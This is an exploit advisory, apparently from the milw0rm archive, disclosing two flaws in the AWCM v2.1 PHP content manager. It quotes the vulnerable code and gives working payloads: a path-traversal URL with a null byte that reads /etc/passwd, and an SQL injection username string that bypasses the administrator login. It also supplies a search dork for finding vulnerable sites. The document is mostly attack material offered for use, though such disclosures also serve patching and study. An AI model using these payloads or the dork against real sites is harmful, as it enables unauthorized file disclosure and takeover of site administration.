63 lines
No EOL
3 KiB
Text
63 lines
No EOL
3 KiB
Text
---------------------------------AWCM v2.1 (LFI/Auth Bypass) Vulnerabilities---------------------------------------
|
|
#
|
|
# #### # ### ## ### #### #### ### ##### #### #### ### # ### #### ######
|
|
## # # ## # # # # # # # # # # # # # # # # # # # ## # # # # # #
|
|
# # # # # # # # # # # # # # # # # # # # # # # # #
|
|
# # ### # # ### # # ## ### ### # # # # ### ## # # # ### #
|
|
#### # # #### # # ###### # # # # # # # # # # # # # # #
|
|
# # # # # # # # # # # # # # ## # # # # # # # ## # #
|
|
## ##### ## ###### ### ### #### ### # # ### #### #### ### # ### # #### ###
|
|
|
|
|
|
#----------------------------------------------------------------------------------------------------------------
|
|
Script : AWCM
|
|
version : v2.1
|
|
Language:PHP
|
|
Demo : http://awcm.sourceforge.net/
|
|
Download : http://awcm.sourceforge.net/ar/down_pro.php?id=30
|
|
Dork: intext:Powered by AWCM v2.1
|
|
Found by :SwEET-DeViL
|
|
|
|
need magic_quotes_gpc = Off
|
|
|
|
#----------------------------------------------------------------------------------------------------------------
|
|
::: Local File Disclosure Vulnerability :::
|
|
)=> a.php
|
|
.................................................................................................................
|
|
if (isset($_GET['a'])) {
|
|
$a = $_GET['a']; <======================================:{
|
|
if (file_exists("addons/$a/index.php")) {
|
|
include ("addons/$a/index.php");
|
|
}
|
|
.................................................................................................................
|
|
#Exploit:
|
|
|
|
http://www.site.com/a.php?a=../../../../../../../../etc/passwd%00
|
|
|
|
##############################################################################
|
|
::: Auth Bypass SQL Injection Vulnerability :::
|
|
|
|
)=> login.php AND control/login.php
|
|
|
|
.................................................................................................................
|
|
if(isset($_GET['do'])) {
|
|
$user = $_POST['username']; <======================================:{
|
|
$pass = md5($_POST['password']);
|
|
|
|
$cp_login_query = mysql_query("SELECT id,username,password,level FROM awcm_members WHERE level = 'admin' AND username = '$user' AND password = '$pass'");
|
|
.................................................................................................................
|
|
#Exploit:
|
|
|
|
put as username : 'or 1=1/*
|
|
|
|
##############################################################################
|
|
|
|
www.arab4services.net
|
|
/---------------------------------------------------\
|
|
|+------------------------------------------------+ |
|
|
|| SwEET-DeViL & viP HaCkEr | |
|
|
|| gamr-14(at)hotmail.com | |
|
|
|+------------------------------------------------+ |
|
|
\---------------------------------------------------/
|
|
|
|
# milw0rm.com [2009-07-23] |